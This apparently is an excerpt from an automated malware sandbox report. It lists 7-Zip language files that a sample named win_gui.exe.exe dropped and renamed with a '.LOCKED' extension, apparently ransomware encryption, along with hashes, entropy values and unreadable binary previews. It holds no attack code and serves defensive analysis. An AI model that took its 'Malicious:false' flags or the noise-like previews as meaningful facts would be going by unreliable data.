                                Preview:X.J.X..80.....cDm.^.yr.....M..0?.....Y..t...[W#...3..<8.@...%Z.L.Kg..5F....\...!...1..v+...cy..v....v3m.!.T....!.ax....-./..y..|.......N..B.Rc.(..._,.V/.B..T......3..I.r....y.....,..c.b...].P.g...+3....}p.Z...Z.zM..ne./b}Y..j....c..M.p..6..h..e..|....Z.~-j...........~.*.Wp.2.>.._..*eNDr...D......g.&k..8.......`...O.....A."...}y..3....{...d....3.M...[q...p.f.|..|`.>....u.6.Q.C.8.o.^..ZW7...~..<*e...V8WEm.J..6B.?z.Q|?rxD0e..B.@Pr...v..i........Uw.J.$e.-..Q..`.....;4.?0.....~.#.a.|I...Q./7\8x...g ..aK....*q*.N...\5.>.W".;....9.H..i.h.x.y.y...#..'.;e.l)Id7W...y....i.ZMK.r../.#..Q.n.......&.A.c .y[<.#P.?.g\n.;..............6M`.7.......~.Ah....tw.L._..n...3.v.vMY&..v.a...|.Cr. ..D...^F....=...c.9....;...>.>.P,.L..f..a...9,..s;.{Q.$..Y.....M....c..".>.n.....%..+?.*.V..r3^.........T?n.G.Ha&....x.Z.6...P.?*....y..y.=.....-!X...~$....d_.V...0./Y.f.^.lCB\=g........l.|.5.Hh].@. _.z.....Q......-....!.6-7....fC.M.e!5...R..1z....>.Ni..pe........O..H...N...+

                                C:\Program Files\7-Zip\Lang\fr.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10518
                                Entropy (8bit):7.983045665488439
                                Encrypted:false
                                SSDEEP:192:ULZ0SCPJNYe9sgnu8VL2R2Kzf17Y2wEVJYOWKEebRlSWBGAkL8mqmu++VOY:UarqgnugLCA6YJsYWPkL87++VOY
                                MD5:1912280F96CE2958E3430656C91386CC
                                SHA1:9316C6A7BAB87331AF834E751592BE69589A8AFB
                                SHA-256:3A5763F7FE7E42726CB2D365D7F23816D6DE2F7EEDC83B4AB2511FFFAF7B3F03
                                SHA-512:4B308ACC58B913C15F3C081042B78449FA772F691115A3DE2A8179B74872994A8975A32494155E0940D79EAC919952D5C105AB83BBC93DE4DEDDF8B81BCC3F25
                                Malicious:false
                                Preview::...g..A...AZ8R.V23.._..E.(m.+.`.....p@.]..3..hd.Za.l./}:f^..Dg..........F....c4%. ...5{.O.}z..P..U..K.J2..>`..3.....$.z.H#....R...%.......`..[m...&....G....d...b}.z.3..X...s..T.T...h ......8...Nw7ut.;G.h..........D.0,..v..j'..<....475.{0R.....r`...;H..Iv.......A..E.T.'.-V...YjO...f>.,..mOWrZ.e~......q@.__5.-y..l.....|+..}._.. ..:...T..#..N.v}.Y+...8.O....j.._@.;22.....M.!d.b..(.J.....;.H.mN..*..z..z.+.>.g...I<..Hz...pm*.F....!...=.u~H.....U.S..^E'.&....6.y;.....'..*...C....P.........+...7.lV.}...K...4..Z..^d....f.<.....z.2.^c..IX.].x...L.y.cJN"cM3..Y".^.9....W.1........:5b..........k.......y.$Y.q.;W........p..KZ.,..f...(....>.B.Q..S,#...WG.B.1'.1.+..B..>.....r"..l..z..6M&..Li.I$I..Q....@c.b.p,.*..5.,o+..L.R....NT.B .=.H..iF.....*.ga.3............D.=V....f.rKVT0~.N.b.....<{...9..Eb.B.4y..^{VT.....gj.oS..u^.U.I`.?.9..CN.`...w>.>z.........c.Tt..k..}...Jt.rM+......}..7_...;sQo.....9......l.u.....t.. .q...........w........K....B2...+.

                                C:\Program Files\7-Zip\Lang\fr.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10518
                                Entropy (8bit):7.983045665488439
                                Encrypted:false
                                SSDEEP:192:ULZ0SCPJNYe9sgnu8VL2R2Kzf17Y2wEVJYOWKEebRlSWBGAkL8mqmu++VOY:UarqgnugLCA6YJsYWPkL87++VOY
                                MD5:1912280F96CE2958E3430656C91386CC
                                SHA1:9316C6A7BAB87331AF834E751592BE69589A8AFB
                                SHA-256:3A5763F7FE7E42726CB2D365D7F23816D6DE2F7EEDC83B4AB2511FFFAF7B3F03
                                SHA-512:4B308ACC58B913C15F3C081042B78449FA772F691115A3DE2A8179B74872994A8975A32494155E0940D79EAC919952D5C105AB83BBC93DE4DEDDF8B81BCC3F25
                                Malicious:false
                                Preview::...g..A...AZ8R.V23.._..E.(m.+.`.....p@.]..3..hd.Za.l./}:f^..Dg..........F....c4%. ...5{.O.}z..P..U..K.J2..>`..3.....$.z.H#....R...%.......`..[m...&....G....d...b}.z.3..X...s..T.T...h ......8...Nw7ut.;G.h..........D.0,..v..j'..<....475.{0R.....r`...;H..Iv.......A..E.T.'.-V...YjO...f>.,..mOWrZ.e~......q@.__5.-y..l.....|+..}._.. ..:...T..#..N.v}.Y+...8.O....j.._@.;22.....M.!d.b..(.J.....;.H.mN..*..z..z.+.>.g...I<..Hz...pm*.F....!...=.u~H.....U.S..^E'.&....6.y;.....'..*...C....P.........+...7.lV.}...K...4..Z..^d....f.<.....z.2.^c..IX.].x...L.y.cJN"cM3..Y".^.9....W.1........:5b..........k.......y.$Y.q.;W........p..KZ.,..f...(....>.B.Q..S,#...WG.B.1'.1.+..B..>.....r"..l..z..6M&..Li.I$I..Q....@c.b.p,.*..5.,o+..L.R....NT.B .=.H..iF.....*.ga.3............D.=V....f.rKVT0~.N.b.....<{...9..Eb.B.4y..^{VT.....gj.oS..u^.U.I`.?.9..CN.`...w>.>z.........c.Tt..k..}...Jt.rM+......}..7_...;sQo.....9......l.u.....t.. .q...........w........K....B2...+.

                                C:\Program Files\7-Zip\Lang\fur.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8125
                                Entropy (8bit):7.976748587746032
                                Encrypted:false
                                SSDEEP:192:TGBmICO0y3d1kTS+0aMq3nV+FyYfJP9pQl4+VOW:CBXD0yfUwY3ngZfJPA4+VOW
                                MD5:5830E5A9DEA08D62187A3DA6FCA60766
                                SHA1:7C46CFAB2C100213CCDA3C63AE979D9E27D67138
                                SHA-256:0D6E9788DA910A85E8FB04702D84AAE81B5D544EA9BE9ABE4F8A72E4FC4EA6C6
                                SHA-512:5710DAA1B092688AF6EB8B54FDB01D391BF0B4A3EA24D171B221F2611DAA18252A38AF676B55C0EDCC1512420111F59A4A8EF883A9F114E504535991695E2028
                                Malicious:false
                                Preview:..R..IFB..M...noh7.]W..(."w...U....*..eB.."p[...}.....V2`.`-..$uL3^e".^..Z...B(..z.(.mU..).I....N.r.[..<\m.t!..S...d.x..'..j...|......%.b...0.."=.%cLx.u_..;...G..0~.W].e....g..:.....NA....M..Z.D>=...q...g....Vb.R..Nfa......4.../q....v..h.h/..a....li....)V......J#um]S.....U.o..v...m^.8p:.^t...-.D=..+N.We....N.....p2...-.JZ....zS..T.8.0/"...))>...f..on......A.W.D..`...[a_x..4.d..#.l.r;.A......Mb...g.=|....1zj.:.`.?.....O.*..H..IqW...;Q.:T.{qi.G.:...`..G..]mo.~s....7.]l..b,7c..!O.....9O.z/a..r.(....!..v.[.WO.:Z.(....S..f*.;C...../.a..a...Q..`...A$...."hV.....z.T..R.9.9..y..L...q........j..z......Dh...-Q..z....0...3.........@.F..u.`..#.\...6.n<?.........m...=..?KD.|.......O...$..M....3~Y.a........j.....].N.d......%...W\.<.q-.l...9.E...j..>.......V.J.....X..[U...G....7...X0.]D...Tg*...t..#..<......5.7...B#...`}L^..Vu.C...m.g.>.?.w.gR...9}..V.%j.x.....TR[.M.;........y(.......'.c1}5p..|.0...#.#.../.%mF.rx.I'.......A.......t.K.

                                C:\Program Files\7-Zip\Lang\fur.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8125
                                Entropy (8bit):7.976748587746032
                                Encrypted:false
                                SSDEEP:192:TGBmICO0y3d1kTS+0aMq3nV+FyYfJP9pQl4+VOW:CBXD0yfUwY3ngZfJPA4+VOW
                                MD5:5830E5A9DEA08D62187A3DA6FCA60766
                                SHA1:7C46CFAB2C100213CCDA3C63AE979D9E27D67138
                                SHA-256:0D6E9788DA910A85E8FB04702D84AAE81B5D544EA9BE9ABE4F8A72E4FC4EA6C6
                                SHA-512:5710DAA1B092688AF6EB8B54FDB01D391BF0B4A3EA24D171B221F2611DAA18252A38AF676B55C0EDCC1512420111F59A4A8EF883A9F114E504535991695E2028
                                Malicious:false
                                Preview:..R..IFB..M...noh7.]W..(."w...U....*..eB.."p[...}.....V2`.`-..$uL3^e".^..Z...B(..z.(.mU..).I....N.r.[..<\m.t!..S...d.x..'..j...|......%.b...0.."=.%cLx.u_..;...G..0~.W].e....g..:.....NA....M..Z.D>=...q...g....Vb.R..Nfa......4.../q....v..h.h/..a....li....)V......J#um]S.....U.o..v...m^.8p:.^t...-.D=..+N.We....N.....p2...-.JZ....zS..T.8.0/"...))>...f..on......A.W.D..`...[a_x..4.d..#.l.r;.A......Mb...g.=|....1zj.:.`.?.....O.*..H..IqW...;Q.:T.{qi.G.:...`..G..]mo.~s....7.]l..b,7c..!O.....9O.z/a..r.(....!..v.[.WO.:Z.(....S..f*.;C...../.a..a...Q..`...A$...."hV.....z.T..R.9.9..y..L...q........j..z......Dh...-Q..z....0...3.........@.F..u.`..#.\...6.n<?.........m...=..?KD.|.......O...$..M....3~Y.a........j.....].N.d......%...W\.<.q-.l...9.E...j..>.......V.J.....X..[U...G....7...X0.]D...Tg*...t..#..<......5.7...B#...`}L^..Vu.C...m.g.>.?.w.gR...9}..V.%j.x.....TR[.M.;........y(.......'.c1}5p..|.0...#.#.../.%mF.rx.I'.......A.......t.K.

                                C:\Program Files\7-Zip\Lang\fy.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7041
                                Entropy (8bit):7.970777120808513
                                Encrypted:false
                                SSDEEP:192:3dFYiAE+G8LlUiL9f3jIjX40Qabb+gaKm+VO6:3d7+9BUiL9felbb+gQ+VO6
                                MD5:2D21F8A91C915AD30C2DB13460DAC1C4
                                SHA1:CCEE58C4459ACA66AF37F8CC4B9E14C85C666651
                                SHA-256:0090C6C08EC8C1F4518ECE18ADF1C05683C9A87A16DD3D9179C5BCFE7A333E98
                                SHA-512:303CEA15E5E89E8FAEC17E60DF5ED892874395CF92B04B8B8BE021FD86505B7E1165CDE4EAAE8503B9122BDB33BA55A2FFA02A77B98E48E6AB1D00BC37C9051F
                                Malicious:false
                                Preview:.......MG..I.NY..../.........>...wnT.O.v..g..WAdb.'.9j./...D......g......S5....p..B.}c.%.*.E$...rS].....t.h..%..b..B\..#B...bGvCO...e...f)).!?wR.....S[B..[....q.....#[...NN$.S........Y...E.O...0.}*w....J....<m.D#.0......,R.....?c.....Q....F...U.3..+.~...........lj...\...7.crT...7.....`..l..."zW..QG..#...~.Q%K....u{...r..&..B..\^..*n9M..6x.,8.h.l.^.~...R...U..`..r\.....E...%s... &.'.y$..j.`...t..e.#.u..zD.{.F.....)K:.3.........T.-.w.<+[..H....)y....W...@..^...]..Hd..Y.ZK.{.5..}.....zq.Jy.#.9..qM...RQF..<..h.b\.E.)....1...@$.B]...]&YAA....2+O..t.........d...}..'.E..Wu.%(.W....[.N...?]6=VW....}.`.._G7....0.D..k%.....]{....,O..rVD.Q...........[).p..py...O..Xh...G..r...."...............d......o.A.|..{...x..3R$*...-E....<...'W...^...h:t].7. .kBI..v|=?..x...q..A.u.u4^...G.{}Wl%Gh.F..XG[...2..a..8'...9d.niK.]c.....K.T.G...u.@.y.....Q..Iz..Xb.%.k..!=.&~B...ow..........H-j.!....[......q9bbD..G..K,e.+pU..#.....Q.+.TT..Wqo.0.u....p.u..}.r.......

                                C:\Program Files\7-Zip\Lang\fy.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7041
                                Entropy (8bit):7.970777120808513
                                Encrypted:false
                                SSDEEP:192:3dFYiAE+G8LlUiL9f3jIjX40Qabb+gaKm+VO6:3d7+9BUiL9felbb+gQ+VO6
                                MD5:2D21F8A91C915AD30C2DB13460DAC1C4
                                SHA1:CCEE58C4459ACA66AF37F8CC4B9E14C85C666651
                                SHA-256:0090C6C08EC8C1F4518ECE18ADF1C05683C9A87A16DD3D9179C5BCFE7A333E98
                                SHA-512:303CEA15E5E89E8FAEC17E60DF5ED892874395CF92B04B8B8BE021FD86505B7E1165CDE4EAAE8503B9122BDB33BA55A2FFA02A77B98E48E6AB1D00BC37C9051F
                                Malicious:false
                                Preview:.......MG..I.NY..../.........>...wnT.O.v..g..WAdb.'.9j./...D......g......S5....p..B.}c.%.*.E$...rS].....t.h..%..b..B\..#B...bGvCO...e...f)).!?wR.....S[B..[....q.....#[...NN$.S........Y...E.O...0.}*w....J....<m.D#.0......,R.....?c.....Q....F...U.3..+.~...........lj...\...7.crT...7.....`..l..."zW..QG..#...~.Q%K....u{...r..&..B..\^..*n9M..6x.,8.h.l.^.~...R...U..`..r\.....E...%s... &.'.y$..j.`...t..e.#.u..zD.{.F.....)K:.3.........T.-.w.<+[..H....)y....W...@..^...]..Hd..Y.ZK.{.5..}.....zq.Jy.#.9..qM...RQF..<..h.b\.E.)....1...@$.B]...]&YAA....2+O..t.........d...}..'.E..Wu.%(.W....[.N...?]6=VW....}.`.._G7....0.D..k%.....]{....,O..rVD.Q...........[).p..py...O..Xh...G..r...."...............d......o.A.|..{...x..3R$*...-E....<...'W...^...h:t].7. .kBI..v|=?..x...q..A.u.u4^...G.{}Wl%Gh.F..XG[...2..a..8'...9d.niK.]c.....K.T.G...u.@.y.....Q..Iz..Xb.%.k..!=.&~B...ow..........H-j.!....[......q9bbD..G..K,e.+pU..#.....Q.+.TT..Wqo.0.u....p.u..}.r.......

                                C:\Program Files\7-Zip\Lang\ga.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8918
                                Entropy (8bit):7.980983576896489
                                Encrypted:false
                                SSDEEP:192:TwOCyWdUAFW3S60Cp5LZBN18CMc5RGHlpjylcrYxVX9lk1QTscB3w+VOx:0dyGUxS60OjB6peOrGlQ+VOx
                                MD5:82A8F6E768F0A90071FA616628078B25
                                SHA1:C8567B6A7A5F80FBD93EA425AA4E311474855C17
                                SHA-256:FBC7C02677EA2FED04A91877BB14CD6DFF9F53800AEA47B37AB51292EC6927B0
                                SHA-512:34493B78C56B50B6FD11630E0794289CC8650EC4E8C149846950874B9A2D61C5E6DE94DAE4594C753CCE58696AAC04E52A974B92A08D238A0D7B58CE9BB8541C
                                Malicious:false
                                Preview:DQ..6LV\.......9u...{^..A6......u.I.D.I'..Sl.-.N%.J....X.t....V)..Ra.`.8..`...yM).?....X..oZ<.\.Bo....(...Q0.2a.<I%.U..#'.....FD[.....P.sUz.K.c.X......thp..r.6..8...,....}...8?.....w...r;`........_..4...9..u. .w'B.".h.s.y..9D...E....m....H.Z..R8.j7u....X.%...1.I9^..d.1.X_^......p..a!L.gw-`Wd....miM.......?..V.&..X..S.....Ua..i..).eM....9.r.....(.U.~..#Y .n....~....u....6...Ah..t..H:..[M|.}~x"..m...Q.....,.o.:.9..*...{..'F........1<.3.{/. .c.[..=.9..~..`.}.=.aQ.$.%3...*&gsF./C.`8iB.e5........Cx.3:7...Kk\..v.5..z.7...9.7.D.C.j.g...... 9..q.m..jI..0>.....;...w..R`..T.x..8.g.....E-|...V.=.6C.V./.+..mX...........>.,...a.L...G&...zkm.........o.M...Q<....O+.y5.v..Z...U:..b...!T....8A...O'.r.....po.r..S....Y.; .vMQ....l...h.(H..<.4..gj./J......u..685..p.]..c.,.`.......}..LjjAj..........l5.t....h...e._q8x.[..V..9..|/L...d.....gM....<..WC._....2...b.J)|..p...Q...............h...N..G:o......R.*i....V......]....,.$...........`...7...&....+d....&....m.J'q:

                                C:\Program Files\7-Zip\Lang\ga.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8918
                                Entropy (8bit):7.980983576896489
                                Encrypted:false
                                SSDEEP:192:TwOCyWdUAFW3S60Cp5LZBN18CMc5RGHlpjylcrYxVX9lk1QTscB3w+VOx:0dyGUxS60OjB6peOrGlQ+VOx
                                MD5:82A8F6E768F0A90071FA616628078B25
                                SHA1:C8567B6A7A5F80FBD93EA425AA4E311474855C17
                                SHA-256:FBC7C02677EA2FED04A91877BB14CD6DFF9F53800AEA47B37AB51292EC6927B0
                                SHA-512:34493B78C56B50B6FD11630E0794289CC8650EC4E8C149846950874B9A2D61C5E6DE94DAE4594C753CCE58696AAC04E52A974B92A08D238A0D7B58CE9BB8541C
                                Malicious:false
                                Preview:DQ..6LV\.......9u...{^..A6......u.I.D.I'..Sl.-.N%.J....X.t....V)..Ra.`.8..`...yM).?....X..oZ<.\.Bo....(...Q0.2a.<I%.U..#'.....FD[.....P.sUz.K.c.X......thp..r.6..8...,....}...8?.....w...r;`........_..4...9..u. .w'B.".h.s.y..9D...E....m....H.Z..R8.j7u....X.%...1.I9^..d.1.X_^......p..a!L.gw-`Wd....miM.......?..V.&..X..S.....Ua..i..).eM....9.r.....(.U.~..#Y .n....~....u....6...Ah..t..H:..[M|.}~x"..m...Q.....,.o.:.9..*...{..'F........1<.3.{/. .c.[..=.9..~..`.}.=.aQ.$.%3...*&gsF./C.`8iB.e5........Cx.3:7...Kk\..v.5..z.7...9.7.D.C.j.g...... 9..q.m..jI..0>.....;...w..R`..T.x..8.g.....E-|...V.=.6C.V./.+..mX...........>.,...a.L...G&...zkm.........o.M...Q<....O+.y5.v..Z...U:..b...!T....8A...O'.r.....po.r..S....Y.; .vMQ....l...h.(H..<.4..gj./J......u..685..p.]..c.,.`.......}..LjjAj..........l5.t....h...e._q8x.[..V..9..|/L...d.....gM....<..WC._....2...b.J)|..p...Q...............h...N..G:o......R.*i....V......]....,.$...........`...7...&....+d....&....m.J'q:

                                C:\Program Files\7-Zip\Lang\gl.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10221
                                Entropy (8bit):7.980138795487489
                                Encrypted:false
                                SSDEEP:192:jCvtigy/z6yDu/8iLKtgzXLKe+HBynvFbXPPFqoj5nIBPa+VOr:jKQH6yDu/8dgz7Ke+HCFzPEon2a+VOr
                                MD5:ACD8247D681AF7541255A1C4E0637CE4
                                SHA1:773356F6A905A93C7F53DBE9056462B0776790AC
                                SHA-256:E0BC28672997750E568A6651C90B13EC2AD695790E5ED8870908371ABC043DA9
                                SHA-512:0B07510F660216191F8351B422410C8203B80D53BC24F5EB2C873907049EF99ABF3D699596FB8689FCEF71976093C68ABF70FDA16BCF1E76C44748D9FD4B95C1
                                Malicious:false
                                Preview:...$U.A...5.A.4....AK..7.6#Y!Z..+.A......;._.mp...h....n.P..-C./.Z....q.l..K6...m+.X\.<....n..at.............!..N...49...#.....3wu.%....sL...mI.j#6P...Z.@1%....D....b.`..}.j..k@.:.@.a.SW......./.aEwkY.V....j.rj.3....j....n>]......S..L... .R.@...H./]~._..G........E.K]?..?..N!.%p....}ty..5w.$.{....G.=....ONk-..`.......S.B..;{....O..jDv'i*.c11m.M...Z..0S...E.`..Z.a..^_.e....{.3.Z...h.<:#..us.....c...<..~Qu..m.7$.r.G[../..K...'A...n&.9..W..3.].(.....oG....J.@.A..|.-...F~Ju._..cYz'...nM..>r.S^A<...nQ.)...g.^..U.......o:..:$&@..I...a=O.(;.2...G....>.....qM.&0O"...;w...8y/..,.Z.&....4...O.gC.Fb$K...7..\.g..t.a...1:.wu....)...#..p..L8$ ......8-....+3N..&.]..u.+.!#p*).+....!b.8.v.N...l{h.X..4~.wh.*I.BX.Pv...8.r.^....?bq.1.......<.Z..t....u........w....6@{u..g....*..f..[....9".A.\U.{.vf...?.c....I.b!E.&....[....j.xsRl.;+6..PSy....P.N%.CQ...W....*n].c...k...9bP.....e........4_}...Z.:....R.?6..\D=.....;8...F......d...=2.,...-J.]%=.M......An..L./..~.

                                C:\Program Files\7-Zip\Lang\gl.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10221
                                Entropy (8bit):7.980138795487489
                                Encrypted:false
                                SSDEEP:192:jCvtigy/z6yDu/8iLKtgzXLKe+HBynvFbXPPFqoj5nIBPa+VOr:jKQH6yDu/8dgz7Ke+HCFzPEon2a+VOr
                                MD5:ACD8247D681AF7541255A1C4E0637CE4
                                SHA1:773356F6A905A93C7F53DBE9056462B0776790AC
                                SHA-256:E0BC28672997750E568A6651C90B13EC2AD695790E5ED8870908371ABC043DA9
                                SHA-512:0B07510F660216191F8351B422410C8203B80D53BC24F5EB2C873907049EF99ABF3D699596FB8689FCEF71976093C68ABF70FDA16BCF1E76C44748D9FD4B95C1
                                Malicious:false
                                Preview:...$U.A...5.A.4....AK..7.6#Y!Z..+.A......;._.mp...h....n.P..-C./.Z....q.l..K6...m+.X\.<....n..at.............!..N...49...#.....3wu.%....sL...mI.j#6P...Z.@1%....D....b.`..}.j..k@.:.@.a.SW......./.aEwkY.V....j.rj.3....j....n>]......S..L... .R.@...H./]~._..G........E.K]?..?..N!.%p....}ty..5w.$.{....G.=....ONk-..`.......S.B..;{....O..jDv'i*.c11m.M...Z..0S...E.`..Z.a..^_.e....{.3.Z...h.<:#..us.....c...<..~Qu..m.7$.r.G[../..K...'A...n&.9..W..3.].(.....oG....J.@.A..|.-...F~Ju._..cYz'...nM..>r.S^A<...nQ.)...g.^..U.......o:..:$&@..I...a=O.(;.2...G....>.....qM.&0O"...;w...8y/..,.Z.&....4...O.gC.Fb$K...7..\.g..t.a...1:.wu....)...#..p..L8$ ......8-....+3N..&.]..u.+.!#p*).+....!b.8.v.N...l{h.X..4~.wh.*I.BX.Pv...8.r.^....?bq.1.......<.Z..t....u........w....6@{u..g....*..f..[....9".A.\U.{.vf...?.c....I.b!E.&....[....j.xsRl.;+6..PSy....P.N%.CQ...W....*n].c...k...9bP.....e........4_}...Z.:....R.?6..\D=.....;8...F......d...=2.,...-J.]%=.M......An..L./..~.

                                C:\Program Files\7-Zip\Lang\gu.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18377
                                Entropy (8bit):7.9892067294718085
                                Encrypted:false
                                SSDEEP:384:GJo/I5zciqfJQDsRCVuE0lcN9W8P7zw16NJm0sEm+VO7:Gy/oIiOJUsRCvvAc7zlSp/
                                MD5:322C004B41DFDD54D9623DB7C0B92A34
                                SHA1:1D47B2CA89838EA4FA18EA330166A9901E8CC30D
                                SHA-256:FC9B87F507EF7EE4DCA73972E4E2EE0EB0775DCAAB1AA96041607754B0FFD905
                                SHA-512:7460E3BE7AF93DC93BD193753F16FFFF4882A8EA337F629F7195E1E8B90473F39169374939D58CB93295E3E6DDF780F244F5BEB3CB3F3BC66FAEDFF303766563
                                Malicious:false
                                Preview:o...&6....9...,.f| ..4..e...".87.....I.1R.............I.r..8.9...*.".z<..M.T.....T..E.3K...............[%.4..pS..A6...I.......x.%.tmI|.....`.UQ.Dlx.3oQ...&...!.#.WtM.1.rV.....l2N.. :aE..v.....g.A.|....2..@E5.@0.b....!....s...R#...G...(!.YH..o.8.Y....m/.A..M.>.....\..l.2F.5...^jf#.c.....N0.VI..b0.....R8].o.q...&OB..7..f....E.............x..PZ.r:.T'.....2ro&^jF...5-h%6..E=V.*7t..&ya4...h{...o. ..T..OZgA.)L4...X.=...%.....n.u6.4"jw$!...".+X.qz&;\.x*P...`.h....4H..T...Z.c..v..r..3...L..I".C...g....[..t...3.1.+.%.T..$RU.an..7...J),+8B.h.U.+.O.\......Q>Z..+p.....F0..p...p.D..4.4ej.Fk...H'.....;h%..4]..X.(....&x.\...].=.OR|.3g..2^..<Xf..}...G..*...RR....-.+....*.v..Q.V."P........6;..%..EL.H..e..@.....r.~..?.,...&sye.T.0X../.+p.v.?.Oe\....p%...._....C.[IS?.0.>E;t.....A...[.q:..VSQC.Q.U.1.%.^~.n,.Xt..d.[....!..h..fP.."k...z.ST.b%;.vO.C"5.......(..J,F..#6.......u.U.C...|KL~.v...t..d\.v...8.....>}..2.......a0.i.QY...W.!(../.[.G..j.....|].w..;.}..

                                C:\Program Files\7-Zip\Lang\gu.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18377
                                Entropy (8bit):7.9892067294718085
                                Encrypted:false
                                SSDEEP:384:GJo/I5zciqfJQDsRCVuE0lcN9W8P7zw16NJm0sEm+VO7:Gy/oIiOJUsRCvvAc7zlSp/
                                MD5:322C004B41DFDD54D9623DB7C0B92A34
                                SHA1:1D47B2CA89838EA4FA18EA330166A9901E8CC30D
                                SHA-256:FC9B87F507EF7EE4DCA73972E4E2EE0EB0775DCAAB1AA96041607754B0FFD905
                                SHA-512:7460E3BE7AF93DC93BD193753F16FFFF4882A8EA337F629F7195E1E8B90473F39169374939D58CB93295E3E6DDF780F244F5BEB3CB3F3BC66FAEDFF303766563
                                Malicious:false
                                Preview:o...&6....9...,.f| ..4..e...".87.....I.1R.............I.r..8.9...*.".z<..M.T.....T..E.3K...............[%.4..pS..A6...I.......x.%.tmI|.....`.UQ.Dlx.3oQ...&...!.#.WtM.1.rV.....l2N.. :aE..v.....g.A.|....2..@E5.@0.b....!....s...R#...G...(!.YH..o.8.Y....m/.A..M.>.....\..l.2F.5...^jf#.c.....N0.VI..b0.....R8].o.q...&OB..7..f....E.............x..PZ.r:.T'.....2ro&^jF...5-h%6..E=V.*7t..&ya4...h{...o. ..T..OZgA.)L4...X.=...%.....n.u6.4"jw$!...".+X.qz&;\.x*P...`.h....4H..T...Z.c..v..r..3...L..I".C...g....[..t...3.1.+.%.T..$RU.an..7...J),+8B.h.U.+.O.\......Q>Z..+p.....F0..p...p.D..4.4ej.Fk...H'.....;h%..4]..X.(....&x.\...].=.OR|.3g..2^..<Xf..}...G..*...RR....-.+....*.v..Q.V."P........6;..%..EL.H..e..@.....r.~..?.,...&sye.T.0X../.+p.v.?.Oe\....p%...._....C.[IS?.0.>E;t.....A...[.q:..VSQC.Q.U.1.%.^~.n,.Xt..d.[....!..h..fP.."k...z.ST.b%;.vO.C"5.......(..J,F..#6.......u.U.C...|KL~.v...t..d\.v...8.....>}..2.......a0.i.QY...W.!(../.[.G..j.....|].w..;.}..

                                C:\Program Files\7-Zip\Lang\he.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12012
                                Entropy (8bit):7.986846735176714
                                Encrypted:false
                                SSDEEP:192:E4XUMR98fLY2MCAWo0vu1FJuUFrbmKjwDx6P7HWRvhZudKMeL4pz+VO9:E4XUCOY2MVWmkUFrbTqOdGL4l+VO9
                                MD5:9424451CB31377E77985045E7B2FD192
                                SHA1:D86B77FEFD8D5C9FB36A87A8F5B46BE218078677
                                SHA-256:3F3DF4A28D25F2AEC7D5AC56FF2F7352F7A096AE2CF6A5DA719479032494DDA1
                                SHA-512:E85C3871943508F98F13C66DFBE3E773524758EA04D0444953B01E6F5D13989C48A5D1E2618F906FBC35A3C068889635A6E150D128DF3DBCE0531DBD09664132
                                Malicious:false
                                Preview:.Y#.@.O.....I.Z...@!.F..@..T ..Q...1..D......}..!....1...!...sa...7.......m1].|...'.......F.$....Y.I....XP.S.0......^wO[%J....7.$..;H.[..cS...s.O...:.......4:....U.K....\;..@.......q.t.bd..&..u.....+.s....G..E.....+.q....`..........d...iu...D..e....$9.f.v..{z.v-@...n..4'C.u..L..I.*....vdo. .........~......:.O..o._0..q..,...A*...p...j....us?.;._.(.*.....5hW..u...K..".[....k..NFk........d..h9..e0sK+.7/.......]...ZUj.\.jUH...2...sn..g.#.e.PAq...9.s.$G..=..K:...m..Eo..E(.e..{T8J.........{.7}.P..........e@N.JG....ta......C.."g..9# DcX.<....Q...+.-p....c.....5.T.c2.0..-=.~..`...Qw.\b...[..fc...S{....s..L.O.0...g....i..M.<.I....s...N...e...Y....)vM...a.h25....U4..........A@..[/.t....k...h..p.~...Bv:S.Up2.lB..|O.......4..{..:F.ilG.I............7....w....*.R....t.$...i.....D...e..^..a...\S..\.c....9D.%...p.(.W.......t[..@........6....ZG.s............;...-`|.zU....YqB..5.^L.}Ij(...-%..%B..W.....-.... ..(.{..&.`F.+.f...~..R.6.....s..&.]

                                C:\Program Files\7-Zip\Lang\he.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12012
                                Entropy (8bit):7.986846735176714
                                Encrypted:false
                                SSDEEP:192:E4XUMR98fLY2MCAWo0vu1FJuUFrbmKjwDx6P7HWRvhZudKMeL4pz+VO9:E4XUCOY2MVWmkUFrbTqOdGL4l+VO9
                                MD5:9424451CB31377E77985045E7B2FD192
                                SHA1:D86B77FEFD8D5C9FB36A87A8F5B46BE218078677
